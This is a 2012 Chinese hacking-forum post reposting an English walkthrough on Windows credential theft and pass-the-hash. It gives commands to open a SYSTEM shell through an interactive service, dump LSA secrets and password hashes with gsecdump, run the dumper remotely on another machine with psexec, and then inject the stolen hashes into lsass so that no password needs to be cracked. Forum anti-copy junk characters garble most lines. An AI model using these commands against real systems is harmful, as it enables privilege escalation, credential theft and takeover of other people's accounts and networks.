找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1971|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:( I/ ]( M3 z+ p5 O0 ]; x
: }8 A' a! l+ z$ |& ^; t
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
% Z, G: a: p: G5 i1 s[SC] CreateService SUCCESS/ ?+ t# l# a; w; p

8 b+ n, Q( h. B5 z2 aC:\>sc start shellcmdline
/ O- L+ I2 v; N- @+ m, I- G[SC] StartService FAILED 1053:
) ~# M4 T; S2 h+ S: @4 \, p' S" a  s( }' \  a+ K8 \& U5 I6 Q
The service did not respond to the start or control request in a timely fashion.
- B# E$ L/ k4 p' ~. I/ ~+ m; F. Q% D* P
C:\>sc delete shellcmdline
9 L0 v& J7 ~- H! q5 \! j[SC] DeleteService SUCCESS
/ J) C1 |% V0 A% K6 ?5 ?! O, W$ h8 h
------------
6 X5 Z5 Q. H' s/ q+ [1 |2 u, n8 E, m- c) V
Then in the new DOS window:# P, ^' B. S% u, e7 O. V

* r2 b- ~, Z& u/ Y' V) ZMicrosoft Windows XP [Version 5.1.2600]( z1 V% @2 V% i3 ^) F' O! A
(C) Copyright 1985-2001 Microsoft Corp.7 ]  e% F3 L! F7 P3 ~1 i5 z

6 a' e9 O4 e% Y* Y6 q) o& iC:\WINDOWS\system32>whoami, P2 r2 X5 c& K1 I! h2 U! G) E: c
NT AUTHORITY\SYSTEM( g( K- N0 n" A  E

3 V# ~9 U' x  c2 v* J/ H1 NC:\WINDOWS\system32>gsecdump -h
7 a( }5 i7 O) G& H* @: wgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)% Y/ `  [: Q; H" o: i# H% h( x% J& ?
usage: gsecdump [options]! Z' \+ x& |& M2 x( e, \
1 @+ R! L: P6 C% D
options:6 ]) K6 Y, P/ Q' {7 H. [" R) X
-h [ --help ] show help
1 ^0 C# D+ [1 q  n+ N2 W! w-a [ --dump_all ] dump all secrets" @: h9 H* N; ?' }& q- @9 Z' g
-l [ --dump_lsa ] dump lsa secrets' d6 E% ?$ ^( G& V$ C
-w [ --dump_wireless ] dump microsoft wireless connections; |* r7 H  w! Z4 P  E
-u [ --dump_usedhashes ] dump hashes from active logon sessions( T3 \1 ]' B3 t4 |" t9 e+ q
-s [ --dump_hashes ] dump hashes from SAM/AD6 G% I! B! \( E: x+ i' n( a$ I1 z0 @

5 c; Z! Q8 A1 j% i" sAlthough I like to use:) F( _$ ^9 j4 f1 b/ J9 y8 A
: `: G0 ?+ h1 c! s
PsExec v1.83 - Execute processes remotely
. [& f/ p: \+ h( g3 F0 A6 U; D; ZCopyright (C) 2001-2007 Mark Russinovich) s) l! U9 n1 U$ z) ?; C* U
Sysinternals - 链接标记[url]www.sysinternals.com[/url]8 ^. b- e/ u6 }, D2 `2 ^  _' ^
4 X* ?9 ]4 V: B0 N' V$ X3 Q2 n
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 U9 G; c/ |' O8 I9 ?+ Q
& l9 u, i" N, L6 n8 ^" T
to get the hashes from active logon sessions of a remote system.9 b  _; s- |' Y
! g! Q/ w( u8 F0 b! G, u; z4 A& [5 h! ^
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.& ]1 h' Z+ ~4 j% R

$ [2 l" p% f. K( x8 P2 g( z提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 X: y! ~/ m. o* F( t) X原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
& G; e. X4 o8 S" `
, x. P3 V/ _0 R0 j1 ~我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。% E' u0 \, a& t8 A/ b+ L3 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表